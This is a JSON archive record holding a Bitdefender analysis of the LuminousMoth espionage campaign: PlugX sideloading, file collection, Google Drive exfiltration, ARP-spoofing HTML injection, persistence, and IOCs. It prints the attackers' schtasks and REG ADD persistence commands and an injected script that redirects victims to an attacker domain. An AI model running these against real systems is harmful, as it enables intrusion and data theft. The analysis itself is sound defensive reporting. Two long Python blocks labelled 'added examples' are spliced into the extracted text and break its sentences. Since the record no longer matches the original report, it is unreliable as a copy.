{
	"id": "3b4785e5-a326-47ee-a3d9-7c0e94f092c1",
	"created_at": "2026-04-06T00:10:02.270173Z",
	"updated_at": "2026-04-10T03:36:33.428063Z",
	"deleted_at": null,
	"sha1_hash": "214bf6c0da676d094fb6f0ea1d536a20ecc9df80",
	"title": "LuminousMoth – PlugX, File Exfiltration and Persistence Revisited",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 134524,
	"plain_text": "LuminousMoth – PlugX, File Exfiltration and Persistence Revisited\r\nBy Victor VRABIE\r\nArchived: 2026-04-05 17:17:44 UTC\r\nForeword\r\nA few months ago, Bitdefender researchers started to investigate an extended operation that targeted victims in Myanmar and Thailand for what looked like cyber espionage and intelligence gathering.\r\nMany aspects of this operation were recently described in detail in this article by the Kaspersky team, but we decided to present our perspective on the operation and to offer the additional IOCs we spotted.\r\nThe investigation started with our usual triage process, in which we observed suspicious activity from two processes: C:\\Users\\Public\\Music\\WinWord.exe and C:\\ProgramData\\Msolutions\\svmetrics.exe . As a result, we were able to identify an infection vector and to collect the tools and TTPs specific to this operation.\r\nWe analyzed the chain of events and, on some victims, traced the start of the infection to the file C:\\Users\\\u003cuser\u003e\\Downloads\\COVID-19 Case 12-11-2020(MOTC)\\COVID-19 Case 12-11-2020(1).exe , whose creation time is 2020-11-12 08:21. 
This file is a legitimate WinWord.exe executable vulnerable to DLL sideloading.\r\nThe actions of COVID-19 Case 12-11-2020(1).exe that we were able to reconstruct are:\r\nIt copies itself to C:\\Users\\Public\\Music\\WinWord.exe\r\nIt installs persistence by creating a value named “Microsof” under the Run registry key, with C:\\Users\\Public\\Music\\WinWord.exe as its data\r\nIt starts communicating with the Cobalt Strike C\u0026C www.updatecatalogs.com\r\nMore details on tools and TTPs can be found in the sections below.\r\nKey Findings\r\nA previously unreported payload in the form of the well-known Remote Access Tool PlugX\r\nData exfiltration carried out through Google Drive\r\nMore tools used for data collection\r\nThe attackers perform HTML code injection using ARP spoofing to redirect the victim to a page hosted by the threat actor\r\nExtra findings suggesting that LuminousMoth is connected to Mustang Panda\r\nMore examples of binaries vulnerable to sideloading used in this attack\r\nMore examples of persistence mechanisms\r\nMore IOCs associated with this operation\r\nFmtoptions.dll and PlugX\r\nWe were able to link the C:\\ProgramData\\Msolutions\\svmetrics.exe process with C:\\Users\\Public\\Music\\WinWord.exe , and with the current operation, as we have evidence that svmetrics.exe executed C:\\Users\\Public\\Music\\WinWord.exe more than once; this is the file that COVID-19 Case 12-11-2020(1).exe initially copied alongside the malicious wwlib.dll.\r\nThe svmetrics.exe (InternalName from version info: fmtoptions.exe ) is vulnerable to sideloading and is abused to load Fmtoptions.dll .\r\nAnalyzing the malicious Fmtoptions.dll file, we established that it reads the content of a walk.dat file and decrypts the shellcode that is subsequently executed. The shellcode is responsible for decompressing and loading the final payload, the PlugX implant, which is a DLL whose MZ and PE magic values have been damaged. 
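Because the decompressed PlugX DLL carries damaged MZ and PE magic values, a memory dump of it will not parse in standard PE tooling until the two signatures are put back. The routine below is an added example (not code from this analysis or from PlugX) that does that on a constructed 256-byte stand-in: it locates the PE header through e_lfanew, restores both signatures, and accepts the result only if the COFF header shows a plausible machine type and a non-zero section count, so that an arbitrary blob with a zeroed header is not mistaken for an image. The sample bytes and the 0x80 header offset are constructed for the example.

```python
import struct

# Added example, not code from the Bitdefender analysis or from PlugX: restore
# the MZ and PE signatures of a dumped payload whose magic values were damaged,
# so that ordinary PE parsers accept it again. Only the two signatures are
# written; e_lfanew is used as the locator and the COFF header is sanity-checked
# before the repaired image is returned. The sample blob below is constructed.

MZ = b'MZ'
PE_SIG = b'PE' + bytes(2)          # the 4-byte PE signature: P, E, 0, 0
IMAGE_FILE_DLL = 0x2000
IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
COFF_HEADER_SIZE = 24              # signature (4) + IMAGE_FILE_HEADER (20)


def locate_pe_header(blob):
    '''Read e_lfanew at offset 0x3C and return the PE header offset, or None when
    the buffer is too small or the offset would run past its end.'''
    if len(blob) < 0x40:
        return None
    e_lfanew = struct.unpack_from('<I', blob, 0x3C)[0]
    if e_lfanew + COFF_HEADER_SIZE > len(blob):
        return None
    return e_lfanew


def header_damage(blob):
    '''Tuple of the missing signatures (subset of MZ, PE); empty when intact,
    None when the blob cannot even be located as a PE image.'''
    pe = locate_pe_header(blob)
    if pe is None:
        return None
    missing = []
    if blob[:2] != MZ:
        missing.append('MZ')
    if blob[pe:pe + 4] != PE_SIG:
        missing.append('PE')
    return tuple(missing)


def repair_pe_magic(blob):
    '''Return a repaired copy, or None when the COFF header behind e_lfanew does
    not describe a real x86/x64 image (unknown machine type or zero sections).'''
    pe = locate_pe_header(blob)
    if pe is None:
        return None
    out = bytearray(blob)
    out[:2] = MZ
    out[pe:pe + 4] = PE_SIG
    machine, nsections = struct.unpack_from('<HH', out, pe + 4)
    if machine not in (IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_AMD64) or nsections == 0:
        return None
    return bytes(out)


def is_dll(blob):
    '''Characteristics sits at offset 22 of the PE header; bit 0x2000 marks a DLL,
    which is what the write-up says the decompressed PlugX payload is.'''
    pe = locate_pe_header(blob)
    characteristics = struct.unpack_from('<H', blob, pe + 22)[0]
    return bool(characteristics & IMAGE_FILE_DLL)


def make_damaged_sample():
    '''Constructed 256-byte stand-in for a dumped payload: e_lfanew points at 0x80,
    where an i386 COFF header with 3 sections and the DLL flag sits, while both
    signatures are zeroed as described for the PlugX DLL.'''
    buf = bytearray(0x100)
    struct.pack_into('<I', buf, 0x3C, 0x80)                          # e_lfanew
    struct.pack_into('<HH', buf, 0x84, IMAGE_FILE_MACHINE_I386, 3)   # Machine, NumberOfSections
    struct.pack_into('<H', buf, 0x80 + 22, 0x2102)                   # EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    return bytes(buf)


if __name__ == '__main__':
    dumped = make_damaged_sample()
    print('damage before repair:', header_damage(dumped))
    fixed = repair_pe_magic(dumped)
    print('damage after repair:', header_damage(fixed), 'dll:', is_dll(fixed))
```

Run against a real dump, the same two checks tell an analyst whether the blob is an image with stripped magic (repairable in place) or something else entirely; the machine-type and section-count tests are what stop a zero-filled buffer from being accepted as a DLL.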
More details on the recovered payloads are presented in the following table:\r\nSHA256  Note \r\n9ed86767433b8d26e5b32a5d391f3f08f72dfafd6c7bf652e21e6af5b12b6e3b  PlugX sample (myanmar.flymna[.]net C\u0026C address) \r\n4455a042e511f1c88f39cdd4c93c099af45493aa0cd8e3d40806ac2995da0907  PlugX sample (webmail.mmtimes[.]net C\u0026C address) \r\nhttps://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited\r\nPage 1 of 6\r\nIt’s worth noting that all tools and commands mentioned in the following sections are executed by the svmetrics.exe process that hosts the PlugX implant.\r\nFile Collection\r\nDuring our research, we noticed the execution of C:\\Users\\Public\\Downloads\\unsecapp.exe , a legitimate ESET EHttpSrv.exe file that is abused to load http_dll.dll . The sample of http_dll.dll we identified implements the file collection feature.\r\nAfter the malicious DLL is loaded, the ini file C:\\Users\\Public\\Downloads\\BITS.ini is parsed using GetPrivateProfileIntW and GetPrivateProfileStringW to obtain three parameters, as follows:\r\nAppName  KeyName  Note \r\nRAM  CreateRAM  An integer giving the maximum age in days, counted from the file’s creation time, for a file to be collected; files older than this are skipped. The default value is 60. \r\nRAM  ModifyRAM  An integer giving the maximum age in days, counted from the file’s last write time, for a file to be collected; files older than this are skipped. The default value is 60. \r\nKINDINF  FLIN  The username targeted for exfiltration. The malware recursively lists folders under C:\\Users\\\u003cusername\u003e\\. \r\nThe malware then creates a folder named after the current time, using the format string “%Y-%m-%d %H-%M-%S”, in “C:\\Users\\Public\\Downloads\\”, where all files will be staged. It starts scanning for files in the Documents, Desktop and Downloads folders belonging to the user specified in the “FLIN” string. 
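To reason about which files a given BITS.ini would have made http_dll.dll stage, the following Python model (an added example, not the malware’s code) re-implements the selection rules described in this section: the three ini parameters with their 60-day defaults, the Documents, Desktop and Downloads folders of the FLIN user plus every drive other than C:, the targeted extensions, both age thresholds, and the MD5 de-duplication seeded from the hex hash list. The directory snapshot, the ini content and the run time are constructed; forward slashes stand in for the Windows path separator, and the hash-list layout (concatenated 32-character hex digests) is an assumption, since the write-up only says the hashes are written as hex strings.

```python
import configparser
import hashlib
from datetime import datetime, timedelta

# Added example, not code from the Bitdefender write-up or from http_dll.dll:
# a model of the collector decisions (BITS.ini parameters, targeted folders and
# extensions, age thresholds, MD5 de-duplication against the hex hash list) so
# an analyst can work out offline which files a configuration would have staged.
# Forward slashes replace the Windows separator; the hash-list layout
# (concatenated 32-char hex digests) is an assumption.

TARGET_EXTS = ('.doc', '.docx', '.pdf', '.xlsx', '.exe')
TARGET_DIRS = ('Documents', 'Desktop', 'Downloads')
DEFAULT_DAYS = 60                    # default for both GetPrivateProfileIntW lookups
STAGING_ROOT = 'C:/Users/Public/Downloads/'
STAGING_FMT = '%Y-%m-%d %H-%M-%S'


def parse_bits_ini(text):
    '''Mirror the three lookups: [RAM] CreateRAM and [RAM] ModifyRAM (integers,
    default 60) and [KINDINF] FLIN (the targeted username, default empty).'''
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    create_days = cp.getint('RAM', 'CreateRAM', fallback=DEFAULT_DAYS)
    modify_days = cp.getint('RAM', 'ModifyRAM', fallback=DEFAULT_DAYS)
    user = cp.get('KINDINF', 'FLIN', fallback='')
    return create_days, modify_days, user


def staging_folder(now):
    '''Per-run staging directory, named with the %Y-%m-%d %H-%M-%S format.'''
    return STAGING_ROOT + now.strftime(STAGING_FMT)


def in_scope(path, user):
    '''Documents, Desktop and Downloads of the FLIN user (recursively), plus every
    drive other than C: (the malware skips CD-ROM drives; drive type is not
    modelled for these constructed paths).'''
    parts = path.split('/')
    if parts[0].upper() != 'C:':
        return True
    return (len(parts) > 4 and parts[1] == 'Users' and parts[2] == user
            and parts[3] in TARGET_DIRS)


def fresh_enough(entry, now, create_days, modify_days):
    '''Both limits must hold: age since creation and age since last write.'''
    return (now - entry['created'] <= timedelta(days=create_days)
            and now - entry['modified'] <= timedelta(days=modify_days))


def load_hash_list(blob):
    '''Background-Intelligent-Transfer-Service.bin, re-read at every start to
    seed the vector of already-collected MD5 digests (assumed concatenated hex).'''
    text = blob.decode('ascii', 'ignore').lower()
    return [text[i:i + 32] for i in range(0, len(text) - len(text) % 32, 32)]


def collect(files, ini_text, hash_blob, now):
    '''Return (staged paths, updated hash-list bytes) for one run of the DLL.'''
    create_days, modify_days, user = parse_bits_ini(ini_text)
    seen = load_hash_list(hash_blob)
    staged = []
    for f in files:
        if not f['path'].lower().endswith(TARGET_EXTS):
            continue
        if not in_scope(f['path'], user):
            continue
        if not fresh_enough(f, now, create_days, modify_days):
            continue
        digest = hashlib.md5(f['data']).hexdigest()
        if digest in seen:
            continue                       # identical content was staged before
        seen.append(digest)
        staged.append(f['path'])
    return staged, ''.join(seen).encode('ascii')


NOW = datetime(2021, 3, 1, 12, 0, 0)      # constructed run time
SAMPLE_INI = '''[RAM]
CreateRAM=30
ModifyRAM=10
[KINDINF]
FLIN=alice
'''
# Constructed hash list left by an earlier run: one digest already collected.
PRIOR_HASHES = hashlib.md5(b'seen-before').hexdigest().encode('ascii')


def sample_files():
    '''Constructed directory snapshot that exercises every selection branch.'''
    def ago(days):
        return NOW - timedelta(days=days)
    return [
        {'path': 'C:/Users/alice/Documents/budget.xlsx', 'created': ago(5), 'modified': ago(2), 'data': b'budget-2021'},
        {'path': 'C:/Users/alice/Documents/budget-copy.xlsx', 'created': ago(5), 'modified': ago(2), 'data': b'budget-2021'},
        {'path': 'C:/Users/alice/Desktop/notes.txt', 'created': ago(1), 'modified': ago(1), 'data': b'extension not targeted'},
        {'path': 'C:/Users/alice/Downloads/old.pdf', 'created': ago(100), 'modified': ago(1), 'data': b'created too long ago'},
        {'path': 'C:/Users/bob/Documents/plan.docx', 'created': ago(1), 'modified': ago(1), 'data': b'wrong user'},
        {'path': 'D:/share/report.pdf', 'created': ago(1), 'modified': ago(1), 'data': b'non-C drive is in scope'},
        {'path': 'C:/Users/alice/Documents/already.doc', 'created': ago(1), 'modified': ago(1), 'data': b'seen-before'},
    ]


if __name__ == '__main__':
    staged, new_list = collect(sample_files(), SAMPLE_INI, PRIOR_HASHES, NOW)
    print(staging_folder(NOW))
    for p in staged:
        print('staged', p)
```

On this snapshot only budget.xlsx and the report on the D: drive are staged: the copy with identical content is dropped by the MD5 check, the .txt file by the extension list, the 100-day-old PDF by CreateRAM, the other user’s document by FLIN, and the file whose digest already sits in the hash list by the seeded vector. The per-run folder name and the growing hash list are the two artifacts a responder should look for under C:\\Users\\Public\\Downloads\\ when scoping what was taken.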
It also scans for files on all drives except C:\\ and any CD-ROM drives.\r\nAnother technical detail worth noting is the mechanism used to ensure that all files in the staging folder are unique. The MD5 hash of each file is calculated and looked up in a vector holding all previously seen hashes. If it is not there, the hash is appended to the vector and written as a hex string to the file C:\\Users\\Public\\Downloads\\Background-Intelligent-Transfer-Service.bin . Each time the DLL is executed, this file is parsed and the vector of hashes is repopulated from it, so a file is not staged twice across runs. The targeted files are those with the following extensions:\r\n.doc, .docx, .pdf, .xlsx, .exe\r\nA noteworthy turn took place on 2021-03-09, when svmetrics.exe executed another interesting piece of malware, C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Zoom\\ZoomVideoApp.exe . ZoomVideoApp.exe implements the same collection function but with more features, as it automatically archives the staging folder and exfiltrates the files to the C\u0026C. The sample was analyzed in Kaspersky’s blog post.\r\nThere are many differences between http_dll.dll and ZoomVideoApp.exe , but both samples use an ini file to customize their behavior; the parameters “meeting” and “ssb_sdk” in the ZoomVideoApp.exe configuration are the functional equivalents of “CreateRAM” and “ModifyRAM”, respectively.\r\nThe deployment of ZoomVideoApp.exe can be interpreted as an update to the collection and exfiltration mechanism: for the files collected by http_dll.dll, the attackers had to archive and exfiltrate the files manually.\r\nFile Exfiltration\r\nThe attackers deployed another piece of malware to exfiltrate files: we noticed the execution of a binary from an unusual location, taking an archive name and an authentication token as command-line parameters. 
The files were put into an archive created with the rar.exe utility.\r\nThe process C:\\Kpcms\\Send1.exe was executed multiple times by svmetrics.exe . After analysis, we concluded that the sample uploads the files to Google Drive, as it uses the endpoint https://www.googleapis.com/upload/drive/v3/files?uploadType=media to perform a simple upload. According to the documentation of the endpoint, it is meant for files smaller than 5 MB. To work around this limitation, the attackers had to split the archive into multiple parts and upload each one separately, as suggested by the archive names we encountered.\r\nThis limitation was addressed in a newer version of the tool, as the attackers started to use another sample, C:\\ProgramData\\Adobe\\Send3.exe , for the same purpose. The major improvement was the use of the resumable upload mechanism to upload files bigger than 5 MB. New command-line parameters were introduced, such as one for specifying the chunk size, which allows a file to be uploaded through multiple HTTP PUT operations. There are also options for resuming an upload by specifying the UploadID and for checking whether the upload was successful.\r\nAfter ZoomVideoApp.exe was deployed, the tool was not seen in use anymore, probably because of the exfiltration capabilities of ZoomVideoApp.exe.\r\nArpSpoof and HTML injection\r\nAfter finding that svmetrics.exe executed C:\\ProgramData\\Adobe\\Send3.exe and C:\\ProgramData\\Adobe\\GetChromeCookies.exe on one victim, we took a closer look at the files in C:\\ProgramData\\Adobe\\ , as it seems to be a location where the attackers staged many tools. 
As a result, we noticed the C:\\ProgramData\\adobe\\arpspoof.exe file.\r\nBesides the staging path, which by itself links the file to the attackers, our analysis of this binary revealed several details, described below.\r\nThanks to the RTTI information, we established that arpspoof.exe is actually a modified build of https://github.com/sin5678/zxarps . It was customized to receive an IP and a PORT from the command line and to inject HTML code into the HTTP responses received from that IP:PORT, using ARP spoofing and packet capture through WinPcap. The HTML is hardcoded in the binary itself and is similar to:\r\n\u003chtml\u003e\u003cbody\u003e\u003cscript\u003ewindow.location.href=\"http://microsoft.updatecatalogs[.]com/Microsoft Update Catalog.htm\"\u003c/script\u003e\u003c/b\r\nWe compared the sample with the code from GitHub and noticed another custom modification, in the CARPSpoof::HackHtml function: the HTML is injected only into responses that carry a 200 status code and do not contain any of the strings\r\n“2.58.230.5”, “content-google:” and “X-AspNet-Version: 4.0.30319\\r\\n”\r\nThe injected HTML is meant to redirect the user to http://microsoft.updatecatalogs.com/Microsoft Update Catalog.htm , a web page belonging to the attackers, as the domain updatecatalogs.com is a known C\u0026C for the Cobalt Strike beacon.\r\nAnother interesting detail is the 2.58.230.5 IP and the fact that the tool skips injection into HTTP responses from that IP, probably because that IP was part of the attackers’ infrastructure. Moreover, at the time of this writing, the domain new.mmtimes.org resolves to that IP, and it is quite similar to the mmtimes.net found in the PlugX sample. 
The domain mmtimes.org was already mentioned in the Kaspersky report as being used in earlier operations by Mustang Panda. Therefore, the arpspoof.exe tool, the malicious URL http://microsoft.updatecatalogs[.]com/Microsoft Update Catalog.htm in the injected HTML code and the 2.58.230.5 IP address to which mmtimes.org resolves together suggest that LuminousMoth and Mustang Panda are connected.\r\nMore sideloading\r\nThere are certainly more tools used by the actors in this operation: besides the fmtoptions.exe, WinWord.exe and igfxEM.EXE files vulnerable to sideloading, we found two other vulnerable binaries abused to load a malicious DLL.\r\nThe first case we want to address is C:\\Users\\Public\\Music\\VSTOInstaller.exe , which was executed by the same svmetrics.exe. This sample of the Visual Studio Tools for Office Solution Installer loads vstoloader.dll; the malicious DLL loaded this way, C:\\Users\\Public\\music\\vstoloader.dll , extracts a shellcode from the ret.bin file and executes it. Unfortunately, we were not able to obtain the ret.bin file, so we do not know what role the tool might have.\r\nAlso executed by the same svmetrics.exe process, C:\\Intel\\install\\stay\\AtlTraceTool8.exe is another legitimate binary abused by the attackers. 
The only thing we were able to establish about this binary is that it loads the malicious C:\\Intel\\install\\stay\\1033\\AtlTraceToolUI.dll , but the file could not be obtained.\r\nPersistence\r\nThe data we gathered suggests that at least two of the tools we encountered set up persistence through Run keys:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  C:\\Users\\Public\\Music\\WinWord.exe \r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run  C:\\ProgramData\\Msolutions\\svmetrics.exe \r\nWe also spotted persistence being set up via svmetrics.exe for a few tools (commands as observed):\r\nschtasks.exe /create /sc onstart /ru system /tn MicrosoftOneDirve /tr C:\\Intel\\install\\stay\\AtlTraceTool8.exe\" \"-svc /F \r\nREG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Zoom\" /t REG_SZ /d \"C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Zoom\\ZoomVideoApp.exe\" /F \r\nREG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v BGClient /t REG_SZ /d \"c:\\Users\\Public\\Music\\VSTOInstaller.exe\" /F \r\nIndicators of Compromise\r\nBinaries exploited for sideloading\r\nFile path  SHA256  Note \r\nC:\\Users\\Public\\Music\\WinWord.exe  8cfb55087fa8e4c1e7bcc580d767cf2c884c1b8c890ad240c1e7009810af6736  Winword from m that loads wwlib \r\nC:\\ProgramData\\Msolutions\\svmetrics.exe  f9558aae2ad658885c071975a6efd055e3324717a32ddf551c5760afe766204e  FmtOptions.exe Software Inc.; lo fmtoptions.dll \r\nC:\\Users\\Public\\Downloads\\unsecapp.exe  c3159d4f85ceb84c4a0f7ea9208928e729a30ddda4fead7ec6257c7dd1984763  ESET EHttpSrv http_dll.dll \r\nC:\\Users\\Public\\Music\\VSTOInstaller.exe  fc73a301bf3167cb01e966df1bb0d20ca922ea831298ab85b4301347c6b5df10  Visual Studio To Solution Installe vstoloader.dll \r\nC:\\Intel\\install\\stay\\AtlTraceTool8.exe  197d0ad8e3f6591e4493daaee9e52e53ecf192e32f9d167c67f2ffb408c76f2c 
 Microsoft ATL T loads 1033\\AtlTraceT \r\nFiles used by attackers\r\nSHA256  Filename \r\n82134a024e98e9bde134b8294f2b346cef300202203e88229718967f52becc78  fmtoptions.dll \r\nf75457c62e1f65bfd0b16cd74cecb0325837a7b615378218bd2571818b3dcb46  fmtoptions.dll \r\nccf48d55f99a2bc1f91a92d8afa7ad61559911ff5f4e5e85cbab1177c2581d41  vstoloader.dll \r\n6f20eaca6e9fb4e91826081dd0af81e4dcc2f7c82879f8ba16dea26400963931  http_dll.dll \r\n869e7da2357c673dab14e9a64fb69691002af5b39368e6d1a3d7fda242797622  version.dll \r\n95bcc8c3d9d23289b4ff284cb685b741fe92949be35c69c1faa3a3846f1ab947  wwlib.dll \r\n37b8c0c8664763ecabaed434f98abc3ae2ac8a6a2a09dc395b46196da050c091  getchromecookies.exe \r\n11996a32e5449cca1d8e82b6c43a625913b235d57a4f3e01f560f332cb221931  getchromecookies.exe \r\nb58fdb9b77e11da524d6518634ea31c3c2d1b2625cb009781f310478e98cfb3a  Send1.exe \r\ne826209f6adccc90959bc515598eddd91b61948b115c08257b263e13882aed83  Send3.exe \r\n85d7c880f658e49a56781959e375d46861b87fcee6db17952dcb4530eb4bacd9  arpspoof.exe \r\n361ccc35f7ff405eb904910de126a5775de831b4229a4fdebfbacdd941ad3c56  ZoomVideoApp.exe \r\n9ed86767433b8d26e5b32a5d391f3f08f72dfafd6c7bf652e21e6af5b12b6e3b  PlugX sample (myanmar.flymna[.]net C\u0026C address) \r\n4455a042e511f1c88f39cdd4c93c099af45493aa0cd8e3d40806ac2995da0907  PlugX sample (webmail.mmtimes[.]net C\u0026C address) \r\nbd7a0507f10f92a14f9bbfd708d7821d036342ad78c39537fe0bebeef96f9139  CobaltStrike Beacon (103.15.28[.]195 C\u0026C address) \r\nad50056093467987270b6c560734b59c35edadfbc38d76ca4d6199fc70595446  CobaltStrike Beacon (www.updatecatalogs[.]com C\u0026C address) \r\nURL used in injected HTML code\r\nhttp://microsoft.updatecatalogs.com/Microsoft Update Catalog.htm\r\nMalicious domains\r\nmicrosoft.updatecatalogs[.]com \r\nMalicious IPs\r\nSource: 
https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited"
	],
	"report_names": [
		"luminousmoth-plugx-file-exfiltration-and-persistence-revisited"
	],
	"threat_actors": [
		{
			"id": "7c00086d-9535-4552-8201-1dd725e41b12",
			"created_at": "2023-04-26T02:03:03.128736Z",
			"updated_at": "2026-04-10T02:00:05.239152Z",
			"deleted_at": null,
			"main_name": "LuminousMoth",
			"aliases": [
				"LuminousMoth"
			],
			"source_name": "MITRE:LuminousMoth",
			"tools": [
				"PlugX",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "92049df8-7902-48e8-ad17-97398b923698",
			"created_at": "2022-10-25T16:07:23.81315Z",
			"updated_at": "2026-04-10T02:00:04.757082Z",
			"deleted_at": null,
			"main_name": "LuminousMoth",
			"aliases": [],
			"source_name": "ETDA:LuminousMoth",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434202,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/214bf6c0da676d094fb6f0ea1d536a20ecc9df80.pdf",
		"text": "https://archive.orkl.eu/214bf6c0da676d094fb6f0ea1d536a20ecc9df80.txt",
		"img": "https://archive.orkl.eu/214bf6c0da676d094fb6f0ea1d536a20ecc9df80.jpg"
	}
}